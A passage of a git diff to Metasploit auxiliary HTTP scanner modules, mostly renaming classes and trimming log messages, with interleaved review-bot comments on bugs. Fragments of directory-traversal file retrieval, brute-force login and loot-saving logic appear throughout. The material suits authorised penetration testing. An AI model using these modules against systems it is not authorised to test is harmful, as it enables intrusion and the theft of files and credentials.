@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2cc3915992..fb1a847654 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/robots_txt.rb b/modules/auxiliary/scanner/http/robots_txt.rb index 4d9933953b..e53d89e7de 100644 --- a/modules/auxiliary/scanner/http/robots_txt.rb +++ b/modules/auxiliary/scanner/http/robots_txt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 3cea0a550b..a4c42efdba 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner 
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary t = "/.." * datastore['DEPTH'] - vprint_status("#{peer} - Retrieving #{datastore['FILE']}") + vprint_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ uri = normalize_uri(uri, 'index.php') @@ -58,13 +58,13 @@ class Metasploit3 < Msf::Auxiliary }) if not res - vprint_error("#{peer} - Server timed out") + vprint_error("Server timed out") elsif res and res.body =~ /Error 404 requested page cannot be found/ - vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it") + vprint_error("Either the file doesn't exist, or you don't have the permission to get it") else # We don't save the body by default, because there's also other junk in it. # But we still have a SAVE option just in case - print_good("#{peer} - #{datastore['FILE']} retrieved") + print_good("#{datastore['FILE']} retrieved") vprint_line(res.body) if datastore['SAVE'] @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary res.body, ::File.basename(datastore['FILE']) ) - print_good("#{peer} - File saved as: #{p}") + print_good("File saved as: #{p}") end end end diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index f83d2b5033..ead59e4e57 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb index aef82de583..ddd41a24b6 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb 
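Review bot: The success branch in the s40_traversal.rb hunk at -58,13 is reached for every response that lacks the 404 text. A 403 or 500 error page, or an unrelated 200 page, is therefore reported as `#{datastore['FILE']} retrieved` and, with SAVE set, stored as loot. That leaves false findings in the workspace, which later reporting takes at face value. A status check ahead of the `else` would close the gap: `elsif res.code != 200` followed by `vprint_error("Unexpected HTTP response #{res.code}")`. The `res and` in the existing `elsif` is redundant after `if not res`.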
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index f56d659877..51b10cf29b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index 8e33ae7cea..930dd36d87 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 817d830d11..4533882e40 100644 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb index 7567b73111..f5481de390 100644 --- a/modules/auxiliary/scanner/http/sentry_cdu_enum.rb +++ b/modules/auxiliary/scanner/http/sentry_cdu_enum.rb 
@@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index f3f7d1d534..cd1f376ed9 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary filename = datastore['FILE'] filename = filename[1, filename.length] if filename =~ /^\// - vprint_status("#{peer} - Retrieving file #{datastore['FILE']}") + vprint_status("Retrieving file #{datastore['FILE']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -61,9 +61,9 @@ class Metasploit3 < Msf::Auxiliary # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111) if res && res.code == 200 if res.body =~ /The File was not found/ - vprint_error("#{peer} - Vulnerable server, but the file does not exist!") + vprint_error("Vulnerable server, but the file does not exist!") elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/ - vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") + vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") else p = store_loot( 'manageengine.servicedeskplus', 
@@ -72,10 +72,10 @@ class Metasploit3 < Msf::Auxiliary res.body, filename ) - print_good("#{peer} - File saved in: #{p}") + print_good("File saved in: #{p}") end else - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") end end end diff --git a/modules/auxiliary/scanner/http/sevone_enum.rb b/modules/auxiliary/scanner/http/sevone_enum.rb index 9e8a38d6c5..2551a650e7 100644 --- a/modules/auxiliary/scanner/http/sevone_enum.rb +++ b/modules/auxiliary/scanner/http/sevone_enum.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 19c37446a5..6e556b22b2 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 093251a16e..db3b4664b9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, 'IPMIdevicedesc.xml' ) - print_good("#{peer} - Stored the device description XML in #{path}") + print_good("Stored the device description XML in #{path}") return true else return false 
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_supermicro? - vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller") + vprint_error("This does not appear to be a Supermicro IPMI controller") return end @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary next unless res unless res.code == 200 && res.body.length > 0 - vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}") + vprint_status("Request for #{uri} resulted in #{res.code}") next end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, uri.split('/').last ) - print_good("#{peer} - Password data from #{uri} stored to #{path}") + print_good("Password data from #{uri} stored to #{path}") end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 206f7f416f..cb90ba8639 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner 
@@ -119,18 +119,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...") + vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? - vprint_good("#{peer} - Supermicro IPMI web interface found") + vprint_good("Supermicro IPMI web interface found") else - vprint_error("#{peer} - Supermicro IPMI web interface not found") + vprint_error("Supermicro IPMI web interface not found") return end - vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result - print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, @@ -140,10 +140,10 @@ class Metasploit3 < Msf::Auxiliary }) end - vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result - print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb index e145de83eb..b5ed85615d 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner 
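Review bot: The two progress messages in `run_host` name the scripts `login.gi` and `close_window.gi`, while the matching `print_good` lines a few lines below say `login.cgi` and `close_window.cgi`. Since the strings are being edited anyway, the typo is worth fixing so that verbose output and findings can be matched by name: `vprint_status("Checking CVE-2013-3621 (login.cgi Buffer Overflow) ...")` and `vprint_status("Checking CVE-2013-3623 (close_window.cgi Buffer Overflow) ...")`. `run_host` continues past the end of this hunk.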
diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index d7873f017b..ad85196211 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary travs << "../" * datastore['DEPTH'] travs << file - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi({ "uri" => "/cgi/url_redirect.cgi", @@ -111,26 +111,26 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Checking if it's a #{APP_NAME}....") + print_status("Checking if it's a #{APP_NAME}....") if is_supermicro? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - #{APP_NAME} not found") + print_error("#{APP_NAME} not found") return end - print_status("#{peer} - Login into the #{APP_NAME}...") + print_status("Login into the #{APP_NAME}...") session = login if session.nil? - print_error("#{peer} - Failed to login, check credentials.") + print_error("Failed to login, check credentials.") return else - print_good("#{peer} - Login successful, session: #{session}") + print_good("Login successful, session: #{session}") end contents = read_file(datastore['FILEPATH'], session) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end 
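Review bot: In the `run_host` hunk at -111,26, `print_good("Login successful, session: #{session}")` writes what appears to be the authenticated session identifier to the console at normal verbosity. It would then land in any spooled or shared console log. What `login` returns is not visible here, but if it is a live session token it should be kept out of default output. The change is `print_good("Login successful")` followed by `vprint_status("Session: #{session}")`.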
diff --git a/modules/auxiliary/scanner/http/soap_xml.rb b/modules/auxiliary/scanner/http/soap_xml.rb index adc6eb3a10..7b79dae7cf 100644 --- a/modules/auxiliary/scanner/http/soap_xml.rb +++ b/modules/auxiliary/scanner/http/soap_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/sockso_traversal.rb b/modules/auxiliary/scanner/http/sockso_traversal.rb index b9deea0f9c..17ef2fb7bd 100644 --- a/modules/auxiliary/scanner/http/sockso_traversal.rb +++ b/modules/auxiliary/scanner/http/sockso_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/splunk_web_login.rb b/modules/auxiliary/scanner/http/splunk_web_login.rb index 35833d09af..329a3d0257 100644 --- a/modules/auxiliary/scanner/http/splunk_web_login.rb +++ b/modules/auxiliary/scanner/http/splunk_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 77969a4f9e..0e51d19f55 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket/range_walker' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 56a0b065c0..043a2942e9 100644 
--- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/ssl.rb b/modules/auxiliary/scanner/http/ssl.rb index fb132e01e5..2ac6033fb3 100644 --- a/modules/auxiliary/scanner/http/ssl.rb +++ b/modules/auxiliary/scanner/http/ssl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::WmapScanSSL 
@@ -38,56 +38,65 @@ class Metasploit4 < Msf::Auxiliary connect(true, {"SSL" => true}) #Force SSL - cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + if sock.respond_to? :peer_cert + cert = OpenSSL::X509::Certificate.new(sock.peer_cert) + end disconnect if cert - print_status("#{ip}:#{rport} Subject: #{cert.subject}") - print_status("#{ip}:#{rport} Issuer: #{cert.issuer}") - print_status("#{ip}:#{rport} Signature Alg: #{cert.signature_algorithm}") - public_key_size = cert.public_key.n.num_bytes * 8 - print_status("#{ip}:#{rport} Public Key Size: #{public_key_size} bits") - print_status("#{ip}:#{rport} Not Valid Before: #{cert.not_before}") - print_status("#{ip}:#{rport} Not Valid After: #{cert.not_after}") + print_status("Subject: #{cert.subject}") + print_status("Issuer: #{cert.issuer}") + print_status("Signature Alg: #{cert.signature_algorithm}") + + # If we use ECDSA rather than RSA, our metrics for key size are different + public_key_size = 0 + if cert.public_key.respond_to? :n + public_key_size = cert.public_key.n.num_bytes * 8 + print_status("Public Key Size: #{public_key_size} bits") + end + print_status("Not Valid Before: #{cert.not_before}") + print_status("Not Valid After: #{cert.not_after}") # Checks for common properties of self signed certificates caissuer = (/CA Issuers - URI:(.*?),/i).match(cert.extensions.to_s) if caissuer.to_s.empty? - print_good("#{ip}:#{rport} Certificate contains no CA Issuers extension... possible self signed certificate") + print_good("Certificate contains no CA Issuers extension... possible self signed certificate") else - print_status("#{ip}:#{rport} " +caissuer.to_s[0..-2]) + print_status(caissuer.to_s[0..-2]) end if cert.issuer.to_s == cert.subject.to_s - print_good("#{ip}:#{rport} Certificate Subject and Issuer match... possible self signed certificate") + print_good("Certificate Subject and Issuer match... possible self signed certificate") end alg = cert.signature_algorithm if alg.downcase.include? 
"md5" - print_status("#{ip}:#{rport} WARNING: Signature algorithm using MD5 (#{alg})") + print_status("WARNING: Signature algorithm using MD5 (#{alg})") end vhostn = nil cert.subject.to_a.each do |n| vhostn = n[1] if n[0] == 'CN' end - if public_key_size == 1024 - print_status("#{ip}:#{rport} WARNING: Public Key only 1024 bits") - elsif public_key_size < 1024 - print_status("#{ip}:#{rport} WARNING: Weak Public Key: #{public_key_size} bits") + if public_key_size > 0 + if public_key_size == 1024 + print_status("WARNING: Public Key only 1024 bits") + elsif public_key_size < 1024 + print_status("WARNING: Weak Public Key: #{public_key_size} bits") + end end if cert.not_after < Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid anymore") + print_status("WARNING: Certificate not valid anymore") end if cert.not_before > Time.now - print_status("#{ip}:#{rport} WARNING: Certificate not valid yet") + print_status("WARNING: Certificate not valid yet") end if vhostn - print_status("#{ip}:#{rport} has common name #{vhostn}") + print_status("Has common name #{vhostn}") # Store the virtual hostname for HTTP report_note( @@ -125,7 +134,7 @@ class Metasploit4 < Msf::Auxiliary end else - print_status("#{ip}:#{rport}] No certificate subject or common name found") + print_status("No certificate subject or common name found") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index ee3e135338..40b22af0f8 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient 
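Review bot: In modules/auxiliary/scanner/http/ssl.rb (hunk at -38,56 +38,65), a certificate whose public key does not respond to `n` (an ECDSA key, for example) leaves `public_key_size` at 0, so no key line is printed and the `if public_key_size > 0` block skips both weak-key warnings without saying so. Scan output that is silent about key strength reads the same as output where the key passed the check. I would add an `else` to the `respond_to? :n` test, `print_status("Public Key: #{cert.public_key.class}, size check skipped (no RSA modulus)")`, so the gap is visible to whoever reads the results. The enclosing method starts and ends outside the hunk.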
@@ -30,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary { 'SSL' => true, 'RPORT' => 443, - 'SSLVersion' => 'SSL3' }, 'References' => [ @@ -43,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]) + Opt::SSLVersion ] ) diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index ad2a235717..cccf57bee8 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary uri = target_uri.path peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Retrieving cookie") + vprint_status("Retrieving cookie") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "") @@ -57,10 +57,10 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 session = res.get_cookies else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end - vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + vprint_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "j_security_check"), 
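Review bot: In modules/auxiliary/scanner/http/ssl_version.rb (hunks at -30,7 +30,6 and -43,7 +42,7), the module no longer pins the protocol it negotiates: the `'SSLVersion' => 'SSL3'` default is removed and the local `OptEnum` is replaced by `Opt::SSLVersion`, whose default and allowed values are defined outside this file section. If that default is not SSL3, a default run would test a different protocol version than before, and results recorded before and after this commit would not be comparable. I would either keep an explicit default in the module or add a comment beside the option, such as `# default comes from Opt::SSLVersion; set SSLVersion explicitly to test one protocol`. The enclosing method starts and ends outside both hunks.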
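Review bot: In modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb (hunk at -57,10 +57,10), the `else` branch of `if res and res.code == 200` also runs when `res` is nil, and `vprint_error("Server returned #{res.code.to_s}")` then raises NoMethodError instead of reporting a timeout. Guard it, for example `vprint_error(res ? "Server returned #{res.code}" : "No response from server")`. The same message appears in the hunk at -151,9 +151,9, where the condition is outside the hunk and should be checked for the same case. The enclosing method starts and ends outside these hunks.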
@@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 302 - vprint_status("#{peer} - Login succesful") + vprint_status("Login succesful") else - vprint_error("#{peer} - Login was not succesful!") + vprint_error("Login was not succesful!") return end randomname = Rex::Text.rand_text_alphanumeric(10) - vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "WorkOrder.do"), @@ -114,21 +114,21 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 - vprint_status("#{peer} - Ticket created") + vprint_status("Ticket created") if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) fileid = $1 - vprint_status("#{peer} - File ID is [ #{fileid} ]") + vprint_status("File ID is [ #{fileid} ]") fileauthkey = $2 - vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + vprint_status("Auth Key is [ #{fileauthkey} ]") else - vprint_error("#{peer} - File ID and AuthKey not found!") + vprint_error("File ID and AuthKey not found!") end else - vprint_error("#{peer} - Ticket not created due to error!") + vprint_error("Ticket not created due to error!") return end - vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), 
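Review bot: In modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb (hunk at -114,21 +114,21), the branch that prints `File ID and AuthKey not found!` does not return, so execution falls through to the `Requesting file` request with `fileid` and `fileauthkey` both nil. The sibling branch `Ticket not created due to error!` does return; adding `return` after the not-found message stops the module before it sends a malformed download request and reports on its response. Replacing `$1`/`$2` with `Regexp.last_match(1)` and `Regexp.last_match(2)` would also make the extraction easier to follow. The enclosing method starts and ends outside the hunk.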
@@ -151,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary data, datastore['FILE'] ) - print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]") else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end end end diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 1c2f5a2132..be40bb0c17 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index 3a388d677a..f15b931185 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index 3c141366c7..d8e49a4e95 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 82b8f3d7f4..b48d8560ae 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb 
+++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -111,10 +111,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Unable to download the file. The server timed out.") + print_error("Unable to download the file. The server timed out.") return elsif res and res.body.empty? - print_error("#{peer} - File not found or empty.") + print_error("File not found or empty.") return end @@ -123,24 +123,24 @@ class Metasploit3 < Msf::Auxiliary f = ::File.basename(fname) p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f) - print_good("#{peer} - File saved as: '#{p}'") + print_good("File saved as: '#{p}'") end def run_host(ip) sid, last_login = get_login_data if sid.empty? or last_login.empty? - print_error("#{peer} - Missing required login data. Cannot continue.") + print_error("Missing required login data. Cannot continue.") return end username = datastore['USERNAME'] password = datastore['PASSWORD'] if not auth(username, password, sid, last_login) - print_error("#{peer} - Unable to login. Cannot continue.") + print_error("Unable to login. Cannot continue.") return else - print_good("#{peer} - 